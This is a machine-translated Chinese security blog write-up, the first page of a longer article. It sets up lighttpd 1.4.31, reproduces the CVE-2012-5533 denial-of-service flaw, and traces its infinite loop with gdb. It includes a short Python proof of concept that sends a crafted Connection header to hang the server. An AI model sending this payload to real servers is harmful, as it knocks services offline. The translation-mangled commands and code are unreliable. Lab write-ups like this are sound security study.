lighttpd domain processing denial of service vulnerability environment from the reproduction to the analysis-vulnerability warning-the black bar safety net

A． lighttpd domain processing denial of service vulnerability of the environment to build
1 Install lighttpd
Because this vulnerability requires that a fixed version,so we need to manually install.
wget http://download.lighttpd.net/lighttpd/releases-1.4.x/ lighttpd-1.4.31.tar.gz
tar-zxvf lighttpd-1.4.31.tar.gz
cd lighttpd-1.4.31
To this step, the next step is to perform

./ configure
Command, but in this step may appear the following error:

configure: error: pcre-config not found, install the pcre-devel package or bui with --without-pcre
We need to perform:

yum install gcc glib2-devel openssl-devel pcre-devel bzip2-devel gzip-devel zlib-devel
To update the missing of the associated packet
After installation, continue to perform
./ configure
make && make install
The compilation is completed, perform the step two.
2）copy of the lighttpd executable file
Create a default file:
mkdir lighttpd-test
cd lighttpd-test
Copy:

cp /usr/local/sbin/lighttpd home/lighttpd-test/
3) create the configuration file

vim lighttpd. conf
Write:
server. document-root=“/var/www/”
server. port = 8080
server. username = “www”
server. groupname = “www”
mimetype. assign = (
“. html” => “text/html”,
“. txt” => “text/plain”,
“. jpg” => “image/jpeg”,
“. png?www.myhack58.com” => “image/png? www. myhack58. com”
)
static-file. exclude-extensions = ( “. fcgi”, “. php”, “. rb”, “~”, “. inc” )
index-file. names = ( “index.html” )
4）write their own Welcome page(index.html)

vim /var/www/index.html
html>
head>title>Hellotitle>head>
body>
h1>This is a testh1>
body>
html>
5）Turn on the firewall, start the lighttpd service
Open the firewall:

iptables-I INPUT-p tcp --dport 8080-j ACCEPT
Start the service:

./ lighttpd-f lighttpd. conf
Note: to start the service here must be an absolute path, it can also be your own go on to add the following environment variable where path is home/lighttpd-test/ it.
Start after the display server started.
Next, you can enter the browser test:

http://127.0.0.1:8080
OK,after loading it will display a we write your own Welcome page.
! [](/Article/UploadPic/2017-8/201782318520907. png? www. myhack58. com)

II. lighttpd denial of service vulnerability principle and reproduce
1）principles:vulnerability Description: The CVE(CAN) ID: CVE-2012-5533
lighttpd is an open source lightweight[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm&gt; a).
lighttpd 1.4.31 in the processing of certain HTTP request headers,"http_request_split_value()"function(src/request. c)in processing a specially crafted"Connection"header field will fall into an infinite loop. An attacker exploiting this vulnerability can lead to Lighttpd denial of service.
2. the vulnerability reproduction
Vulnerability script: https://www.exploit-db.com/exploits/22902/
This script is a bash script, need to change the following permissions:
In the script directory execute the command:

chmod +x test.sh
Then execute:

./ test.sh
Good, the execution is successful.
The included python script:
#encoding: utf-8
import socket
if name == ‘main’:
sock=socket. socket(socket. AF_INET, socket. SOCK_STREAM)
sock. connect((‘192...**’, 8080))
sock. send(b’GET/HTTP/1.1\r\nHost: pwn. ed\r\nConnection: TE,Keep-Alive\r\n\r\n’)
sock. close()
print(‘ok’)
Notes:
Command:

ps aux | grep “light*”
View the lighttpd service of process information.

top
View the Task Manager

kill -9 PID
To kill a process
Third, the dynamic and static combination of tracking vulnerability presented reasons
Earlier we known to cause vulnerability function is(src/request. c)inside the"http_request_split_value()"function, so we first find this function position, where I direct this function to cut out:
! [](/Article/UploadPic/2017-8/201782318520721. png? www. myhack58. com)
Let’s take a closer look at the marked red the code, start entering the function b there is certainly value, it will enter the for Loop, the first state is 0, it will go into case 0, however, we look carefully, in fact case 0 inside the for loop is not being executed. Therefore, in case 0, the direct state=1;break;jump out of the switch…case. To continue the for Loop, then state=1,it proceeds to case 1, start=s,then, for the function condition is not equal to‘, and’, the i++, and then enters the if statement, The if statement condition is start=s, executing the break,therefore, continue for loop, state=1, into the case 1.
Someone said, even if for loop, also end of time Ah, then we look carefully under the first for loop, which i value, in fact, is according to the exploit the script to send data and determination of the vulnerability of the script inside‘,’in front of only two bytes, so when equal to‘that’when there is no change, therefore, resulting in a dead loop.
Then, next, using the gdb Debugger live debugging to verify it, is not, as we said above.
Running the exploit script, use the command

gdb-p
Into gdb
Debugging status:

! [](/Article/UploadPic/2017-8/201782318520410. png? www. myhack58. com)

[1] [2] next